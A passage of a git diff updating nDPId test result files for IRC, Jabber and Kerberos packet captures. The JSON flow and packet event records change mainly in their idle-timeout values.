{"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} +00917{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1387554241634,"flow_last_seen":1387554256201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1387554256201,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","packets-captured":29,"packets-processed":29,"total-skipped-flows":0,"total-l4-data-len":7015,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1387554256201} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 29/29 diff --git a/test/results/jabber.pcap.out b/test/results/jabber.pcap.out index 75dc6b8f7..48082957c 100644 
--- a/test/results/jabber.pcap.out +++ b/test/results/jabber.pcap.out 
@@ -1,11 +1,11 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"jabber.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1504181789350} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1504181789350,"flow_last_seen":1504181789350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1504181789350,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1504181789350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789350,"pkt":"AAwpvhIxAFBWwAAICABFAAA0dxlAAIAGjb\/AqDoBwKg6mdDUFGaBHPlXAAAAAIACIAD5dQAAAgQFtAEDAwgBAQQC"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1504181789365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789365,"pkt":"AFBWwAAIAAwpvhIxCABFAAA0AABAAEAGRNnAqDqZwKg6ARRm0NRyyKsUgRz5WIASchCJeAAAAgQFtAEBBAIBAwMH"} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1504181789366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1504181789366,"pkt":"AAwpvhIxAFBWwAAICABFAAAodxpAAIAGjcrAqDoBwKg6mdDUFGaBHPlYcsirFVAQAQA7WwAAAAAAAAAA"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1504181789350,"flow_last_seen":1504181789367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1504181789367,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":13,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1504181789350,"flow_last_seen":1504181789418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1504181789350,"flow_last_seen":1504181789350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1504181789350,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1504181789350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789350,"pkt":"AAwpvhIxAFBWwAAICABFAAA0dxlAAIAGjb\/AqDoBwKg6mdDUFGaBHPlXAAAAAIACIAD5dQAAAgQFtAEDAwgBAQQC"} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1504181789365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789365,"pkt":"AFBWwAAIAAwpvhIxCABFAAA0AABAAEAGRNnAqDqZwKg6ARRm0NRyyKsUgRz5WIASchCJeAAAAgQFtAEBBAIBAwMH"} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1504181789366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1504181789366,"pkt":"AAwpvhIxAFBWwAAICABFAAAodxpAAIAGjcrAqDoBwKg6mdDUFGaBHPlYcsirFVAQAQA7WwAAAAAAAAAA"} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1504181789350,"flow_last_seen":1504181789367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1504181789367,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} 
+00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":13,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1504181789350,"flow_last_seen":1504181789418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":13,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":13,"packets-processed":13,"total-skipped-flows":0,"total-l4-data-len":157,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1504181789418} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 13/13 diff --git a/test/results/kerberos-login.pcap.out b/test/results/kerberos-login.pcap.out index 4fe0df09d..b576bcc59 100644 --- a/test/results/kerberos-login.pcap.out +++ b/test/results/kerberos-login.pcap.out 
@@ -49,12 +49,12 @@ 00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":180000,"flow_min_l4_payload_len":1221,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":1221,"flow_avg_l4_payload_len":1221,"midstream":0,"thread_ts_msec":946716140774,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946716140774,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1244,"pkt_l4_len":1210,"thread_ts_msec":946716140774,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATOSu8AAIARyCcKBQMBCgEMAgBYBEgEurmkbYIErjCCBKqgAwIBBaEDAgENowwbCkRFTllEQy5DT02kDzANoAMCAQGhBjAEGwJ1NaWCA31hggN5MIIDdaADAgEFoQwbCkRFTllEQy5DT02iKTAnoAMCAQKhIDAeGwRjaWZzGxZ2cGMtdzJrM2VudC5kZW55ZGMuY29to4IDMzCCAy+gAwIBF6EDAgEJooIDIQSCAx0aFmxok9g1Ue0357Hr75qdhqZfRht4OHreKB5u\/V5IirkcwENplNxxQmbw8+DFBp6kUxON4ouXLUpsGQja+UwQNswQ7cEXb3TTT7jYMm2q+XU9A8z+Cm+x45x6EPfupXNfUoIz5d+DBXqnAKwiMsohJZBYGmEm7Q+yhVWVar9k\/vQ4EHxPSmoKKOWOqMeWxjcfGizeQcfY\/7A7oBkliScCXMBosF3zWgVn6SZUxx2nLdkS4jVlNmS1jWY0CBy3hQgCl7KtJ88Rxj2JXMQ5Fa0ibQHlt+FeHBgOikUOCt7JR9KHGnKF+V9OwmxFHJrtiKrEW2Cv72q08\/TX55bwUm9jrgvLF+1YsovMtrgWOHLFsVcxNfbdawsk1MAGXI1K8WdNlNxj79Sa+effGMmTt32eF8\/oOYgeR3A+0F1wnFjIQeheNTRLl\/9WBWymTf5CVGZk9I\/sUh0ufZ1o58VaghVEb+aOBC6tWfpsOkLJ9ANhxY1Vw45ioZzS06CBZRvW7MMUcb4Ur7IeznoOXOKL+obkIkaEuJF9dxjVVEK3H8T8BFen6GrrRV4+9gxQ28wWj2B\/3R0I0K8npdyxugyU7o6q1h547H+5tjJ8di
xUeIFR0R+BxQUA1qGlVkB7SS4zvQUHJeQ33GsZmfB09OjxsbZUKDOYPS2DppWChX3zAiJESMybgCQW5ulCO\/DCKGrcKFEaqcfqvdr1e4WyRdwCcvZn2MJR1nu01uw1EbqNmvBlDTHXDpZmQAS+Z9AFAEe6+Jwucjc+X3W9+cKSxj+uTpUbPMfAp3MPTCh88MxPw2Aax6SFtx5IK+P6jE2F6eQfjhX9aV6hdIZ0pWVxFUqJk1oXwgJHigW8nhTnJsDeLgqs70DVvtJOOt9wQIyuysdS5eh4ZJK2TyKfSg9XuEekXtqV8HHagG6OZO87HJsGQmu\/\/tjHaE7Ql4hIoe+fcxYBzuwcDJYmBr6xlBxFqKXZZHTBFk60GqPFITFaX17Oz+6fJYP3RmN2JGKt17gwAhua9IJr3+oyzOLK9Ar9ryp7P5t03iErc\/1gvMC+WI+39aaB\/TCB+qADAgEXooHyBIHv9+WbNZuFKxvCR6wr2zaCGnigV6GBLntoGkqEg4\/vMLz6p+qzEJQC2ilW82BTzXU6scdi61TaIC3oq6sMVee5Q+SNihDQg2j\/e7P09S+lWbe2hxhDb2MYsqe8Lg50XMclkXvYxZYVxgGfh9+QhSOku3gyZ4w550hPMwNPtwT50N8oSP0YzMlcdyjS0yGxX38Sztfi6maarSaN8R8bO1fNlv7DMT0XFldAA9Ujo2zbz4RI5ls2TDkFYA60ukMDSLX5c+pTDKFVkARApYRvSaMnKg1aCCWfstO5zat+wIz45gQKBeA3dPJACT5hwG+Q1qc="} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","packets-captured":25,"packets-processed":24,"total-skipped-flows":0,"total-l4-data-len":29024,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":12,"total-active-flows":12,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":51,"global_ts_msec":946724453221} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946724453221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946724453221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"uKxvNgTjGGbam+N9CABFAAA8DbNAAIAGV6nAqAoDwKgKDABYrOCOu9eK+5UIh6ASIAAObgAAAgQFtAEDAwgEAggKM1tACf\/++SE="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946724453221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="} 
-00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":1555,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":""}} -00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":4664,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":"ubuntu64a"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946724453221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946724453221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"uKxvNgTjGGbam+N9CABFAAA8DbNAAIAGV6nAqAoDwKgKDABYrOCOu9eK+5UIh6ASIAAObgAAAgQFtAEDAwgEAggKM1tACf\/++SE="} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946724453221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="} +00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":1555,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":""}} +00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":4664,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":"ubuntu64a"}} 
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716066779,"flow_last_seen":946716066779,"flow_idle_time":180000,"flow_min_l4_payload_len":1189,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":2400,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1061,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067396,"flow_last_seen":946716067396,"flow_idle_time":180000,"flow_min_l4_payload_len":1192,"flow_max_l4_payload_len":1223,"flow_tot_l4_payload_len":2415,"flow_avg_l4_payload_len":1207,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1065,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067473,"flow_last_seen":946716067513,"flow_idle_time":180000,"flow_min_l4_payload_len":1205,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":1212,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1067,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 
@@ -67,7 +67,7 @@ 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140238,"flow_last_seen":946716140238,"flow_idle_time":180000,"flow_min_l4_payload_len":1182,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":2393,"flow_avg_l4_payload_len":1196,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1090,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140476,"flow_last_seen":946716140476,"flow_idle_time":180000,"flow_min_l4_payload_len":1228,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":2463,"flow_avg_l4_payload_len":1231,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1092,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":180000,"flow_min_l4_payload_len":1202,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":2423,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":6218,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 